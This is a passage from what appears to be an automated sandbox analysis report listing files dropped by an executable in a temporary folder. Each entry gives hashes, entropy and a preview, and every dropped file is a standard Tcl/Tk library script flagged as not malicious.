                                                                                                                                                                                                                                                    Preview:# spinbox.tcl --.#.# This file defines the default bindings for Tk spinbox widgets and provides.# procedures that help in implementing those bindings. The spinbox builds.# off the entry widget, so it can reuse Entry bindings and procedures..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..# Copyright (c) 1999-2000 Jeffrey Hobbs.# Copyright (c) 2000 Ajuba Solutions.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# Elements of tk::Priv that are used in this file:.#.# afterId -..If non-null, it means that auto-scanning is underway.#...and it gives the "after" id for the next auto-scan.#...command to be executed..# mouseMoved -..Non-zero means the mouse has moved a significant.#...amount since the button went down (so, for example,.#...start dragging out a
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22293
                                                                                                                                                                                                                                                    Entropy (8bit):4.754781774330704
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Tcl autoload index file, version 2.0.# This file is generated by the "auto_mkindex" command.# and sourced to set up indexing information for one or.# more commands. Typically each line is a command that.# sets an element in the auto_index array, where the.# element name is the name of a command and the value is.# a script that loads the command...set auto_index(::tk::dialog::error::Return) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::dialog::error::Details) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::dialog::error::SaveToLog) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::dialog::error::Destroy) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::dialog::error::bgerror) [list source [file join $dir bgerror.tcl]].set auto_index(bgerror) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::ButtonInvoke) [list source [file join $dir button.tcl]].set auto_index(::tk::ButtonAutoInvoke) [list source [file join
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5143
                                                                                                                                                                                                                                                    Entropy (8bit):4.671801205676465
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# tearoff.tcl --.#.# This file contains procedures that implement tear-off menus..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# ::tk::TearoffMenu --.# Given the name of a menu, this procedure creates a torn-off menu.# that is identical to the given menu (including nested submenus)..# The new torn-off menu exists as a toplevel window managed by the.# window manager. The return value is the name of the new menu..# The window is created at the point specified by x and y.#.# Arguments:.# w -...The menu to be torn-off (duplicated)..# x -...x coordinate where window is created.# y -...y coordinate where window is created..proc ::tk::TearOffMenu {w {x 0} {y 0}} {. # Find a unique name to use for the torn-off menu. Find the first. # ancestor of w that is a toplevel but not a menu,
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):33953
                                                                                                                                                                                                                                                    Entropy (8bit):4.915282191126566
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# text.tcl --.#.# This file defines the default bindings for Tk text widgets and provides.# procedures that help in implementing the bindings..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..# Copyright (c) 1998 by Scriptics Corporation..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# Elements of ::tk::Priv that are used in this file:.#.# afterId -..If non-null, it means that auto-scanning is underway.#...and it gives the "after" id for the next auto-scan.#...command to be executed..# char -..Character position on the line; kept in order.#...to allow moving up or down past short lines while.#...still remembering the desired position..# mouseMoved -..Non-zero means the mouse has moved a significant.#...amount since the button went down (so, for exampl
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):18037
                                                                                                                                                                                                                                                    Entropy (8bit):5.011040594036543
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# tk.tcl --.#.# Initialization script normally executed in the interpreter for each Tk-based.# application. Arranges class bindings for widgets..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1996 Sun Microsystems, Inc..# Copyright (c) 1998-2000 Ajuba Solutions..#.# See the file "license.terms" for information on usage and redistribution of.# this file, and for a DISCLAIMER OF ALL WARRANTIES...package require Tcl 8.5.;# Guard against [source] in an 8.4- interp before....;# using 8.5 [package] features..# Insist on running with compatible version of Tcl.package require Tcl 8.5.0.# Verify that we have Tk binary and script components from the same release.package require -exact Tk 8.5.19..# Create a ::tk namespace.namespace eval ::tk {. # Set up the msgcat commands. namespace eval msgcat {..namespace export mc mcmax. if {[interp issafe] || [catch {package require msgcat}]} {. # The msgcat package is not available. S
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):54195
                                                                                                                                                                                                                                                    Entropy (8bit):4.980984810583439
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:arK2vrrHpHxgsOo66U+uDKjrvX8NzpNCHK7fCN4:ar9vrr0Po66U+sK/vmpNCHK7f24
                                                                                                                                                                                                                                                    MD5:38EEC162FAA1C129B10151C0202EE75D
                                                                                                                                                                                                                                                    SHA1:0C1659800A4D0301DBE8953FEFCBA68F7014ABA7
                                                                                                                                                                                                                                                    SHA-256:DE3AFF8A62DF7A9CA1A78466033314B75357D0CA8A21D3DBFB7699E55740F6AB
                                                                                                                                                                                                                                                    SHA-512:58F218B5152520EF8C62C25859227BB1C49DECA6C14A72420B55EE623F6A3BA0268C45B8C4B178B139E2F92D5EA43CF926A850BDD553877D8B0C79328D47ABE4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# tkfbox.tcl --.#.#.Implements the "TK" standard file selection dialog box. This.#.dialog box is used on the Unix platforms whenever the tk_strictMotif.#.flag is not set..#.#.The "TK" standard file selection dialog box is similar to the.#.file selection dialog box on Win95(TM). The user can navigate.#.the directories by clicking on the folder icons or by.#.selecting the "Directory" option menu. The user can select.#.files by clicking on the file icons or by entering a filename.#.in the "Filename:" entry..#.# Copyright (c) 1994-1998 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..package require Ttk...#----------------------------------------------------------------------.#.#.. I C O N L I S T.#.# This is a pseudo-widget that implements the icon list inside the.# ::tk::dialog::file:: dialog box..#.#----------------------------------------------------------------------..#
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3342
                                                                                                                                                                                                                                                    Entropy (8bit):4.893964295093112
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:xICAIX5RupDdMrwuQb8qRZRK9FVGQJFVGQuxzUFIG0usf2kGKQH+n5dvW88L+iSo:hXoFADfVta9DY
                                                                                                                                                                                                                                                    MD5:909F379DB70A6072D49D0B48D07A32FD
                                                                                                                                                                                                                                                    SHA1:D6E0323EB4549327E5A4722015448A80AC3A99E4
                                                                                                                                                                                                                                                    SHA-256:83D9A5889205EE8EAE23E262F15187EEBFE19375BC6C9D464E570CD5FD1F5B2C
                                                                                                                                                                                                                                                    SHA-512:9ECAE6EF7EC784B5104ADFA2EBBB1F33116470BD3A0346D04D945A3A20C569EC052C28BCF4E914F4264D0CA80C27AD5FB43078CFE38318203E5698B6B84D13CC
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Ttk widget set: Alternate theme.#..namespace eval ttk::theme::alt {.. variable colors. array set colors {..-frame .."#d9d9d9"..-window.."#ffffff"..-darker ."#c3c3c3"..-border.."#414141"..-activebg ."#ececec"..-disabledfg."#a3a3a3"..-selectbg."#4a6984"..-selectfg."#ffffff". }.. ttk::style theme settings alt {...ttk::style configure "." \.. -background .$colors(-frame) \.. -foreground .black \.. -troughcolor.$colors(-darker) \.. -bordercolor.$colors(-border) \.. -selectbackground .$colors(-selectbg) \.. -selectforeground .$colors(-selectfg) \.. -font ..TkDefaultFont \.. ;...ttk::style map "." -background \.. [list disabled $colors(-frame) active $colors(-activebg)] ;..ttk::style map "." -foreground [list disabled $colors(-disabledfg)] ;. ttk::style map "." -embossed [list disabled 1] ;...ttk::style configure TButton \.. -anchor center -width -11 -padding "1 1" \.. -relief raised -shiftrelief 1 \.. -highlightthickness 1 -highligh
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2001
                                                                                                                                                                                                                                                    Entropy (8bit):4.976834248247965
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:mjP8dTLsQdWyrF4srKp7UPl7UzT7Ub0aeKgNIii6jOMj0b3M+t2bUuERG6dup+Kx:tdlBlblITKleKgNX1gPc+JFzVcX0jX4
                                                                                                                                                                                                                                                    MD5:288F477ED1FBFBB02CF9E35B23878EDB
                                                                                                                                                                                                                                                    SHA1:BBC4AD4A502D52DEDB40D44BBFCB7DA7897BBDC4
                                                                                                                                                                                                                                                    SHA-256:C2D4B12BD82C056B3A1B5C655FFC2D85208DF74C3FA486EF64AADBC64A021F95
                                                                                                                                                                                                                                                    SHA-512:CE28CCFE9F7E16AC5B9E5C8C8A0445ECBAE82493F8A5C779B4FA4E2FD9BA1F7E7D4A644AC6283A104AADE2EF1F5CFAC676B52CC5D700ACF5DF77653006FB9A4B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Aqua theme (OSX native look and feel).#..namespace eval ttk::theme::aqua {. ttk::style theme settings aqua {...ttk::style configure . \.. -font TkDefaultFont \.. -background systemWindowBody \.. -foreground systemModelessDialogActiveText \.. -selectbackground systemHighlight \.. -selectforeground systemModelessDialogActiveText \.. -selectborderwidth 0 \.. -insertwidth 1...ttk::style map . \.. -foreground {disabled systemModelessDialogInactiveText... background systemModelessDialogInactiveText} \.. -selectbackground {background systemHighlightSecondary... !focus systemHighlightSecondary} \.. -selectforeground {background systemModelessDialogInactiveText... !focus systemDialogActiveText}...# Workaround for #1100117:..# Actually, on Aqua we probably shouldn't stipple images in..# disabled buttons even if it did work.....ttk::style configure . -stipple {}...ttk::style configure TButton -anchor center -width -6..ttk::style configure Toolbutton -
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2978
                                                                                                                                                                                                                                                    Entropy (8bit):4.8919006418640265
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:hpNRZ/rtWkRMC0ScGHsAEfKPi7K1MFNQ6z4Dvh8niT6CUI+SfRHThp:DNRZzse1cGH3UvKmFNQ6z2hT6CUI+4Hb
                                                                                                                                                                                                                                                    MD5:EA7CF40852AFD55FFDA9DB29A0E11322
                                                                                                                                                                                                                                                    SHA1:B7B42FAC93E250B54EB76D95048AC3132B10E6D8
                                                                                                                                                                                                                                                    SHA-256:391B6E333D16497C4B538A7BDB5B16EF11359B6E3B508D470C6E3703488E3B4D
                                                                                                                                                                                                                                                    SHA-512:123D78D6AC34AF4833D05814220757DCCF2A9AF4761FE67A8FE5F67A0D258B3C8D86ED346176FFB936AB3717CFD75B4FAB7373F7853D44FA356BE6E3A75E51B9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Bindings for Buttons, Checkbuttons, and Radiobuttons..#.# Notes: <Button1-Leave>, <Button1-Enter> only control the "pressed".# state; widgets remain "active" if the pointer is dragged out..# This doesn't seem to be conventional, but it's a nice way.# to provide extra feedback while the grab is active..# (If the button is released off the widget, the grab deactivates and.# we get a <Leave> event then, which turns off the "active" state).#.# Normally, <ButtonRelease> and <ButtonN-Enter/Leave> events are .# delivered to the widget which received the initial <ButtonPress>.# event. However, Tk [grab]s (#1223103) and menu interactions.# (#1222605) can interfere with this. To guard against spurious.# <Button1-Enter> events, the <Button1-Enter> binding only sets.# the pressed state if the button is currently active..#..namespace eval ttk::button {}..bind TButton <Enter> ..{ %W instate !disabled {%W state active} }.bind TButton <Leave>..{ %W state !active }.bind TButton <Key-space>.{ ttk:
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4261
                                                                                                                                                                                                                                                    Entropy (8bit):4.849408646746382
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:9NlU3tCKW3PiAu4UZQsk+EBSucCtCqM368CtTU/+RR8Rf/sY2+rF+xzFjueNoDKM:SHjO7uCkqM3JCNU/RrVb
                                                                                                                                                                                                                                                    MD5:F2EEFF6F288437CA0DA802F6844A414C
                                                                                                                                                                                                                                                    SHA1:61A722FFDA5F5FBA842F673AC3B95062452567C2
                                                                                                                                                                                                                                                    SHA-256:4CC2DC26FE379F69CE46A73ABFBABEB9DD5509C41616E1D5A8395BE94170C62C
                                                                                                                                                                                                                                                    SHA-512:23DA52FA6E8046CF383BEFD338B96550DE253983EEB3F29F183AD4BFCDBDA730B93ED9C6F0EAE3CEE816FF978FD77DBBC8B1C714B18120B718EB017D37BCB0D7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# "Clam" theme..#.# Inspired by the XFCE family of Gnome themes..#..namespace eval ttk::theme::clam {. variable colors . array set colors {..-disabledfg."#999999"..-frame ."#dcdad5"..-window ."#ffffff"..-dark.."#cfcdc8"..-darker ."#bab5ab"..-darkest."#9e9a91"..-lighter."#eeebe7"..-lightest ."#ffffff"..-selectbg."#4a6984"..-selectfg."#ffffff". }.. ttk::style theme settings clam {...ttk::style configure "." \.. -background $colors(-frame) \.. -foreground black \.. -bordercolor $colors(-darkest) \.. -darkcolor $colors(-dark) \.. -lightcolor $colors(-lighter) \.. -troughcolor $colors(-darker) \.. -selectbackground $colors(-selectbg) \.. -selectforeground $colors(-selectfg) \.. -selectborderwidth 0 \.. -font TkDefaultFont \.. ;...ttk::style map "." \.. -background [list disabled $colors(-frame) \.... active $colors(-lighter)] \.. -foreground [list disabled $colors(-disabledfg)] \.. -selectbackground [list !focus $colors(-darkest
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3520
                                                                                                                                                                                                                                                    Entropy (8bit):4.904850162459333
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:yAJZjsTMw9EEy6kvzuVubguxjFVGQJFVGQuxzUFIGQutK2MRvD7J+iSVaND2kG/h:yAJZ8MhJiV8fVIV7Urt
                                                                                                                                                                                                                                                    MD5:8071763DA22437B3DBBA8276DFCB31D9
                                                                                                                                                                                                                                                    SHA1:FBC8DC3198F49A6915A8AB6B4A388450B71A998D
                                                                                                                                                                                                                                                    SHA-256:92F7BEFAD42820E988806601DCA49719FA651C88B8767B3347B13706EE3C17F9
                                                                                                                                                                                                                                                    SHA-512:E49B2DDBA1FC6E53BAA5B39AAAD496B6931562CB135F8EAB495661229FAD7085CEBDEA28221F3D1927B96012E3B3AD1ECD41A36E42AD672628F9FD2C755C07D4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# "classic" Tk theme..#.# Implements Tk's traditional Motif-like look and feel..#..namespace eval ttk::theme::classic {.. variable colors; array set colors {..-frame.."#d9d9d9"..-window.."#ffffff"..-activebg."#ececec"..-troughbg."#c3c3c3"..-selectbg."#c3c3c3"..-selectfg."#000000"..-disabledfg."#a3a3a3"..-indicator."#b03060". }.. ttk::style theme settings classic {..ttk::style configure "." \.. -font..TkDefaultFont \.. -background..$colors(-frame) \.. -foreground..black \.. -selectbackground.$colors(-selectbg) \.. -selectforeground.$colors(-selectfg) \.. -troughcolor.$colors(-troughbg) \.. -indicatorcolor.$colors(-frame) \.. -highlightcolor.$colors(-frame) \.. -highlightthickness.1 \.. -selectborderwidth.1 \.. -insertwidth.2 \.. ;...# To match pre-Xft X11 appearance, use:..#.ttk::style configure . -font {Helvetica 12 bold}...ttk::style map "." -background \.. [list disabled $colors(-frame) active $colors(-activebg)]..ttk::style map "." -
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):12394
                                                                                                                                                                                                                                                    Entropy (8bit):5.023972528049574
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:l/9k9hqpFXQN9lQt3NvnIW+KYNbrulkL90t98VrQETczIT9QeSaQjJI1/P0lcLrM:BhlLtVL5MmIRK
                                                                                                                                                                                                                                                    MD5:CF03B3F5E179F5032AFB6355905636A0
                                                                                                                                                                                                                                                    SHA1:D4C7EAC03B8ECAD6A94E7A9EB7BBFF562768ED3C
                                                                                                                                                                                                                                                    SHA-256:30BB473C0471F4D015FCF4B51044A026520D53927F61F3D514EA53B8AF0BCF67
                                                                                                                                                                                                                                                    SHA-512:DAE0DDB29D6E1E38EF65C70001BF836F1A12CFA9246658A87DFBBE02F6CB949C00F0A2ADBCA6C2200D583F2AB71F3E6BAB02C754801C0EAEEB2880D2ACD91122
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Combobox bindings..#.# <<NOTE-WM-TRANSIENT>>:.#.#.Need to set [wm transient] just before mapping the popdown.#.instead of when it's created, in case a containing frame.#.has been reparented [#1818441]..#.#.On Windows: setting [wm transient] prevents the parent.#.toplevel from becoming inactive when the popdown is posted.#.(Tk 8.4.8+).#.#.On X11: WM_TRANSIENT_FOR on override-redirect windows.#.may be used by compositing managers and by EWMH-aware.#.window managers (even though the older ICCCM spec says.#.it's meaningless)..#.#.On OSX: [wm transient] does utterly the wrong thing..#.Instead, we use [MacWindowStyle "help" "noActivates hideOnSuspend"]..#.The "noActivates" attribute prevents the parent toplevel.#.from deactivating when the popdown is posted, and is also.#.necessary for "help" windows to receive mouse events..#."hideOnSuspend" makes the popdown disappear (resp. reappear).#.when the parent toplevel is deactivated (resp. reactivated)..#.(see [#1814778]). Also set [wm resiz
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4007
                                                                                                                                                                                                                                                    Entropy (8bit):4.827479665184231
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:xtIni2E1nmuVoLlTxG6qVXvDiPOaCkhxKLbqnJ2RLWumgMJVZlZPDjsfMh8vIviX:sn+myoLBxG3laOqJlZT3rkdSVOJm0
                                                                                                                                                                                                                                                    MD5:74596004DFDBF2ECF6AF9C851156415D
                                                                                                                                                                                                                                                    SHA1:933318C992B705BF9F8511621B4458ECB8772788
                                                                                                                                                                                                                                                    SHA-256:7BDFFA1C2692C5D1CF67B518F9ACB32FA4B4D9936ED076F4DB835943BC1A00D6
                                                                                                                                                                                                                                                    SHA-512:0D600B21DB67BF9DADBDD49559573078EFB41E473E94124AC4D2551BC10EC764846DC1F7674DAA79F8D2A8AEB4CA27A5E11C2F30EDE47E3ECEE77D60D7842262
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Map symbolic cursor names to platform-appropriate cursors..#.# The following cursors are defined:.#.#.standard.-- default cursor for most controls.#.""..-- inherit cursor from parent window.#.none..-- no cursor.#.#.text..-- editable widgets (entry, text).#.link..-- hyperlinks within text.#.crosshair.-- graphic selection, fine control.#.busy..-- operation in progress.#.forbidden.-- action not allowed.#.#.hresize..-- horizontal resizing.#.vresize..-- vertical resizing.#.# Also resize cursors for each of the compass points,.# {nw,n,ne,w,e,sw,s,se}resize..#.# Platform notes:.#.# Windows doesn't distinguish resizing at the 8 compass points,.# only horizontal, vertical, and the two diagonals..#.# OSX doesn't have resize cursors for nw, ne, sw, or se corners..# We use the Tk-defined X11 fallbacks for these..#.# X11 doesn't have a "forbidden" cursor (usually a slashed circle);.# "pirate" seems to be the conventional cursor for this purpose..#.# Windows has an IDC_HELP cursor, but it's not
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3684
                                                                                                                                                                                                                                                    Entropy (8bit):4.893081856580555
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:EyE4jTUC5zu/cbtCBRCbxcFfFIGQJFIGQkUFIG0uI+x3ouPcW88nKI+ifVaVCflC:nE+Uoi/hjB1+Atj/bf30QOdt
                                                                                                                                                                                                                                                    MD5:79F1C9D16EC1B66762E82B73113C3A12
                                                                                                                                                                                                                                                    SHA1:51544CECBDF72CE799A80373BE727A8AB9CCA34F
                                                                                                                                                                                                                                                    SHA-256:436CA9AD206F26DF3B4F665AB2EB60A24BB833699172EE91F5A1ADAAFAC9951F
                                                                                                                                                                                                                                                    SHA-512:7BAD8EBFF17E18C9BD7F336AEEDFAE67DB25303B6F7948362AF5C93F7945337592803A22CF676C25E8879F097A7DAEF9EA7A8036FF76723E0720CE7EB9ED46B8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Settings for default theme..#..namespace eval ttk::theme::default {. variable colors. array set colors {..-frame.."#d9d9d9"..-foreground."#000000"..-window.."#ffffff"..-text ."#000000"..-activebg."#ececec"..-selectbg."#4a6984"..-selectfg."#ffffff"..-darker ."#c3c3c3"..-disabledfg."#a3a3a3"..-indicator."#4a6984". }.. ttk::style theme settings default {...ttk::style configure "." \.. -borderwidth .1 \.. -background .$colors(-frame) \.. -foreground .$colors(-foreground) \.. -troughcolor .$colors(-darker) \.. -font ..TkDefaultFont \.. -selectborderwidth.1 \.. -selectbackground.$colors(-selectbg) \.. -selectforeground.$colors(-selectfg) \.. -insertwidth .1 \.. -indicatordiameter.10 \.. ;...ttk::style map "." -background \.. [list disabled $colors(-frame) active $colors(-activebg)]..ttk::style map "." -foreground \.. [list disabled $colors(-disabledfg)]...ttk::style configure TButton \.. -anchor center -padding "3 3" -width -9 \..
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):16655
                                                                                                                                                                                                                                                    Entropy (8bit):4.9802863039779375
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:hRy3ALQkHUx/KPTU3+h/IQzNiQ2iEL8QmOhQVqknFoTOXyJtcC1JMuZm41ZxO25t:GoU3+VmiEyOFWiTOEtcC1S252Ezp
                                                                                                                                                                                                                                                    MD5:D46463299EF819FE034E92B786E4911E
                                                                                                                                                                                                                                                    SHA1:B02D466BA9F0EF9C353E833B7BC85697EF2FE72E
                                                                                                                                                                                                                                                    SHA-256:CA47C52334F62660159FC197A054A0FE0017BD7B62E3295E74BA63D8379016B3
                                                                                                                                                                                                                                                    SHA-512:10AAD0003B61411DA510B96A8A237AA1942D473C1F3C46B50102FA1F3B7E880DE0C73F0B68EEB1A72E60BAAF1E2873EAFFBF9998E9017B947DA5F819386547DA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# DERIVED FROM: tk/library/entry.tcl r1.22.#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..# Copyright (c) 2004, Joe English.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..namespace eval ttk {. namespace eval entry {..variable State...set State(x) 0..set State(selectMode) none..set State(anchor) 0..set State(scanX) 0..set State(scanIndex) 0..set State(scanMoved) 0...# Button-2 scan speed is (scanNum/scanDen) characters..# per pixel of mouse movement...# The standard Tk entry widget uses the equivalent of..# scanNum = 10, scanDen = average character width...# I don't know why that was chosen...#..set State(scanNum) 1..set State(scanDen) 1..set State(deadband) 3.;# #pixels for mouse-moved deadband.. }.}..### Option database settings..#.option add *TEntry.cursor [ttk::cursor text]..### Bindings..#.# Removed the following
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5576
                                                                                                                                                                                                                                                    Entropy (8bit):4.956417003071239
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:Nduphbitcq1Zs/ZrBiZy227IhLkdhetOstWGbRafkeHH+4:3CheHvsbiZyDmJbRa3+4
                                                                                                                                                                                                                                                    MD5:7017B5C1D53F341F703322A40C76C925
                                                                                                                                                                                                                                                    SHA1:57540C56C92CC86F94B47830A00C29F826DEF28E
                                                                                                                                                                                                                                                    SHA-256:0EB518251FBE9CF0C9451CC1FEF6BB6AEE16D62DA00B0050C83566DA053F68D0
                                                                                                                                                                                                                                                    SHA-512:FD18976A8FBB7E59B12944C2628DBD66D463B2F7342661C8F67160DF37A393FA3C0CE7FDDA31073674B7A46E0A0A7D0A7B29EBE0D9488AFD9EF8B3A39410B5A8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Font specifications..#.# This file, [source]d at initialization time, sets up the following.# symbolic fonts based on the current platform:.#.# TkDefaultFont.-- default for GUI items not otherwise specified.# TkTextFont.-- font for user text (entry, listbox, others).# TkFixedFont.-- standard fixed width font.# TkHeadingFont.-- headings (column headings, etc).# TkCaptionFont -- dialog captions (primary text in alert dialogs, etc.).# TkTooltipFont.-- font to use for tooltip windows.# TkIconFont.-- font to use for icon captions.# TkMenuFont.-- used to use for menu items.#.# In Tk 8.5, some of these fonts may be provided by the TIP#145 implementation.# (On Windows and Mac OS X as of Oct 2007)..#.# +++ Platform notes:.#.# Windows:.#.The default system font changed from "MS Sans Serif" to "Tahoma".# .in Windows XP/Windows 2000..#.#.MS documentation says to use "Tahoma 8" in Windows 2000/XP,.#.although many MS programs still use "MS Sans Serif 8".#.#.Should use SystemParametersInfo() inst
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4886
                                                                                                                                                                                                                                                    Entropy (8bit):4.8399606995889455
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:1reigApQy38gaQJy+3nN+PN8JdN3OPqoK4J+wQCV7EkGxIaqc9ld9qtlWnITOZmd:hfbJvnN+PN8JdN3s64J+wQCPGxtqWrqf
                                                                                                                                                                                                                                                    MD5:06F570587F05FC9E20E2E841A5DDB938
